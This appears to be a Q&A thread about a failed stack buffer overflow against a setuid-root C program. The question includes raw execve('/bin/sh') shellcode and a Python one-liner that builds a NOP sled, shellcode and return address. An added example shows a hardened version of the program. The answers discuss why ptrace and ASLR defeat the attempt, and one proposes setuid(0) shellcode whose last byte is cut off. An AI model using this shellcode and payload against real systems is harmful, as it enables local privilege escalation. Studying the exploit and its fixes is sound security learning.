How to get privilege escalation using a vulnerable program with root privilege?


I am trying to exploit privilege escalation for a vulnerable program with root privilege. I tried shellcode for that, but I do not know where I am making a mistake.

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char buf[256];
    int len, i;

    /* Unbounded read: scanf("%s") stops only at whitespace, so input longer
     * than 255 bytes overflows buf (this is the intended vulnerability). */
    scanf("%s", buf);
    len = strlen(buf);

    printf("%s\n", buf);
    return 0;
}

The buffer starts at address "0x7fffffffdfd0". The size of the buffer is 272 bytes. I have used the following shellcode, which is 29 bytes:

\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05

Additionally, I have used the following input for the attack scenario:

(python -c 'print "\x90"*243+"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"+"\xd0\xdf\xff\xff\xff\x7f"') > payload.txt

When I run the program with "run < payload.txt" in GDB, I do not receive root access. Any idea or solution would be appreciated.

2
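As an added example (not code from the question or from either answer), here is a hardened form of the program in the question: the unbounded scanf("%s", buf) is replaced by a length-checked line reader that rejects any line longer than the buffer, and the setuid-root privilege is dropped and verified before untrusted input is parsed. check_line_of_length is a constructed self-check helper with constructed 'A' filler input; neither appears in the original post.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 256  /* same buffer size as the program in the question */

/* Bounded replacement for scanf("%s", buf): reads one line of at most size-1 bytes.
 * Returns 0 on success, -1 on EOF/error, -2 if the line did not fit (drained, rejected). */
int read_bounded_line(FILE *in, char *buf, size_t size) {
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    int c = fgetc(in);                   /* buf holds no newline: did the line end here? */
    if (c == EOF || c == '\n') return 0; /* exactly size-1 bytes, which fit */
    while (c != '\n' && c != EOF) c = fgetc(in); /* drain the rest of the oversized line */
    buf[0] = '\0';
    return -2;
}

/* Give up setuid-root for good before parsing untrusted input; 0 only if the drop is verified. */
int drop_privileges(void) {
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0) return -1;
    return (geteuid() == getuid() && getegid() == getgid()) ? 0 : -1;
}

/* Self-check helper on constructed input (not from the post): one line of nbytes 'A' bytes. */
int check_line_of_length(size_t nbytes) {
    char buf[BUF_SIZE];
    FILE *f = tmpfile();
    if (f == NULL) return -1;
    for (size_t i = 0; i < nbytes; i++) fputc('A', f);
    fputc('\n', f);
    rewind(f);
    int rc = read_bounded_line(f, buf, sizeof buf);
    fclose(f);
    return rc;
}

int main(void) {                         /* hardened form of the program in the question */
    char buf[BUF_SIZE];
    if (drop_privileges() != 0 || read_bounded_line(stdin, buf, sizeof buf) != 0)
        return 1;                        /* refuse the input instead of running on it */
    printf("%s\n", buf);
    return 0;
}
```

A 243-byte sled plus 29 bytes of payload, like the input in the question, is 272 bytes and is rejected with -2 rather than written past the end of buf.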

There are 2 best solutions below

2
Employed Russian On

When I run the program with "run < payload.txt" in GDB, I do not receive root access.

That is expected: setuid programs do not get special privileges from the kernel when they are being ptraced (when they run under a debugger). Otherwise it would be possible to hijack any setuid program (not just a vulnerable one).

The address of buffer starts at "0x7fffffffdfd0".

How do you know that? Did you find that address with GDB? Have you disabled ASLR?

GDB disables ASLR (in order to make debugging easier -- everything is always at the same address).

If you didn't disable ASLR system-wide, then buffer likely does not start at 0x7fffffffdfd0.

0
Febriyanto Nugroho On

I guess, add setuid(0) to your shellcode:

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0)

Modified shellcode:

\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x0